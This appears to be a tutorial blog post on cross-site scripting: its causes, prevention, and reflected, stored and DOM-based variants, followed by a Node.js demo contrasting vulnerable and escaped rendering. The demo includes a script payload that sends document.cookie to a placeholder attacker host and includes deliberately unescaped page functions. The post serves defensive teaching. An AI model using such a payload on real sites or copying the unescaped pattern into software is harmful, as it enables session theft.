శ్రీkanth's Blog

What is Cross Site Scripting (XSS)?

XSS is an attack on web applications in which the attacker gets malicious JavaScript to run in the victims' browsers, in the security context of the targeted website, by injecting it into pages the site serves. Because the injected script runs as if it were part of the site, it can read cookies that are not marked HttpOnly, hijack the user's session, read or modify the DOM, and listen to events such as keystrokes. The collected data is then forwarded to servers the attacker controls.

What are the causes of XSS attacks?

  • Consuming user-supplied data without proper validation
  • Rendering user-supplied data into HTML, JavaScript, or URLs without output encoding or sanitization

How to prevent XSS attacks?

  • Always validate user-supplied data on the server, preferably against an allow-list of the formats you expect
  • Client-side validation improves usability but is not a security control: an attacker can bypass the browser and send requests directly, so every check must also exist on the server
  • Encode user-supplied data for the context it is rendered in (HTML body, attribute, JavaScript, URL); sanitize only when HTML input is genuinely required, and then with a proven sanitizer rather than a home-grown one
  • Enable a Content Security Policy that disallows inline scripts; CSP does not remove the injection, but it limits what an injected script can do

What are different types of XSS?

Reflected XSS attack: In a reflected XSS attack, the attacker places the malicious JavaScript in a parameter of a URL on the target website (for example a search query) and delivers that URL to the site's users through email, chat, forums, etc. When a user clicks the link, the server echoes the parameter back into its HTML response without encoding it, and the browser executes the script as part of the page. The code can then access cookies and the DOM and send that data to the attacker's servers. Nothing is persisted on the server; each victim has to be tricked into sending the crafted request.

Stored XSS attack: In a stored XSS attack, the attacker submits the malicious JavaScript through a legitimate feature such as a comment, profile field, or product review, and the site stores it in its database. It is then included in the HTTP response to every user who views the affected page and executes in their browsers, with no link to click. A third variant, DOM-based XSS, never involves the server: client-side JavaScript reads attacker-controlled input such as location.hash and writes it into the page through an unsafe sink like innerHTML.
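The following is an added example, not code from the original post: a dependency-free Node.js model of the reflected and stored paths described above, placed beside the output-encoding fix from the prevention list. The "server" page functions, the in-memory comments store, the shop.example and attacker.example hosts, and the payload are all constructed for illustration.

```javascript
// Context-aware escaping for text placed in an HTML element body or a
// quoted attribute value. Ampersand goes first so later entities are not
// double-encoded.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Constructed attacker payload, as it would be typed into a query string
// or a comment form. attacker.example is a placeholder host.
const PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>';

// --- Reflected XSS: a search page that echoes ?q= back into the response ---
function searchPageVulnerable(query) {
  return `<h1>Results for: ${query}</h1>`; // raw input lands in HTML
}
function searchPageSafe(query) {
  return `<h1>Results for: ${escapeHtml(query)}</h1>`; // encoded for HTML body
}

// --- Stored XSS: comments saved to a (hypothetical) database and rendered
// for every visitor of the page ---
const commentsDb = []; // constructed in-memory stand-in for a database table
function postComment(text) {
  commentsDb.push(text);
}
function commentsPageVulnerable() {
  return commentsDb.map((c) => `<li>${c}</li>`).join("");
}
function commentsPageSafe() {
  return commentsDb.map((c) => `<li>${escapeHtml(c)}</li>`).join("");
}

// Crude detector: does the rendered HTML still contain an executable
// <script> tag? After escaping, only "&lt;script&gt;" text remains.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Defence in depth: a CSP with no 'unsafe-inline' in script-src. Even if
// encoding is missed somewhere, the injected inline <script> will not run.
const CSP_HEADER =
  "Content-Security-Policy: default-src 'self'; script-src 'self'; " +
  "object-src 'none'; base-uri 'none'";

function demo() {
  // The link an attacker would send: payload URL-encoded into the q parameter.
  const reflectedUrl =
    "https://shop.example/search?q=" + encodeURIComponent(PAYLOAD);
  // What the server sees after the framework decodes the query string.
  const q = new URL(reflectedUrl).searchParams.get("q");
  // Stored path: the same payload submitted once through the comment form.
  postComment(PAYLOAD);
  return {
    reflectedUrl,
    reflectedVulnerable: containsScriptTag(searchPageVulnerable(q)), // true
    reflectedSafe: containsScriptTag(searchPageSafe(q)), // false
    storedVulnerable: containsScriptTag(commentsPageVulnerable()), // true
    storedSafe: containsScriptTag(commentsPageSafe()), // false
    csp: CSP_HEADER,
  };
}

console.log(demo());
```

escapeHtml is correct only for HTML body and quoted-attribute contexts; data placed inside a script block, an event handler, a URL, or CSS needs an encoder for that context, which is why templating engines that escape by default and DOM APIs like textContent (rather than innerHTML) are the practical way to get this right at scale.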
